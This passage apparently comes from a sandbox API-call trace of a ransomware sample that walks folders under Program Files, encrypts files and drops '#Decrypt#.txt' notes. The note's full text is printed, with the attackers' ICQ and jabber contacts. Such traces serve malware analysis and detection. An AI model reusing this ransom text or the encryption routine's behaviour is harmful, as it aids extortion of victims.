jImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.944] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.944] CloseHandle (hObject=0x158) returned 1 [0251.945] GetProcessHeap () returned 0x780000 [0251.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.945] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VideoWall", cAlternateFileName="VIDEOW~1")) returned 1 [0251.945] lstrcmpiW (lpString1="VideoWall", lpString2="Windows") returned -1 [0251.945] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 57 [0251.945] lstrcmpW (lpString1="VideoWall", lpString2=".") returned 1 [0251.945] lstrcmpW (lpString1="VideoWall", lpString2="..") returned 1 [0251.945] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.945] GetProcessHeap () returned 0x780000 [0251.945] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.945] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*") returned 59 [0251.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.945] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.945] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\.") returned 59 [0251.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.946] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.946] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\..") returned 60 [0251.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.946] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2a3ff0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2a3ff0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.946] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.946] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png") returned 77 [0251.946] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.946] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.946] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.946] lstrlenW (lpString=".testttjffg") returned 11 [0251.946] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.946] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.946] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.947] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="videowall.png", cAlternateFileName="")) returned 1 [0251.947] lstrcmpiW (lpString1="videowall.png", lpString2="Windows") returned -1 [0251.947] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png") returned 71 [0251.947] StrStrIW (lpFirst="videowall.png", lpSrch=".horseleader") returned 0x0 [0251.947] lstrcmpW (lpString1="videowall.png", lpString2="#Decrypt#.txt") returned 1 [0251.947] lstrcmpW (lpString1="videowall.png", lpString2="_uninstalling_.png") returned 1 [0251.947] lstrlenW (lpString=".testttjffg") returned 11 [0251.947] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png", lpSrch=".testttjffg") returned 0x0 [0251.947] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.947] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.947] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="videowall.png", cAlternateFileName="")) returned 0 [0251.947] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.947] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\#Decrypt#.txt") returned 71 [0251.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.948] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.948] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.949] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.949] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.950] CloseHandle (hObject=0x158) returned 1 [0251.950] GetProcessHeap () returned 0x780000 [0251.950] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.950] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Vignette", cAlternateFileName="")) returned 1 [0251.950] lstrcmpiW (lpString1="Vignette", lpString2="Windows") returned -1 [0251.950] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 56 [0251.950] lstrcmpW (lpString1="Vignette", lpString2=".") returned 1 [0251.950] lstrcmpW (lpString1="Vignette", lpString2="..") returned 1 [0251.950] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.950] GetProcessHeap () returned 0x780000 [0251.950] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.950] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*") returned 58 [0251.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.972] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\.") returned 58 [0251.972] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.972] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.972] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\..") returned 59 [0251.972] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.972] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.972] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.972] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png") returned 74 [0251.972] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.972] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.973] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.973] lstrlenW (lpString=".testttjffg") returned 11 [0251.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.973] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.973] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png") returned 69 [0251.974] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.974] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.974] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.974] lstrlenW (lpString=".testttjffg") returned 11 [0251.974] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.974] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.974] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.974] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.974] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.974] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.975] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.975] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.975] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.975] lstrlenW (lpString=".testttjffg") returned 11 [0251.975] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.975] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.975] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.975] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8e3932, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8e3932, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.975] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.975] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.975] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.975] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.976] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.976] lstrlenW (lpString=".testttjffg") returned 11 [0251.976] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.976] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.976] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.976] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.976] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.976] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 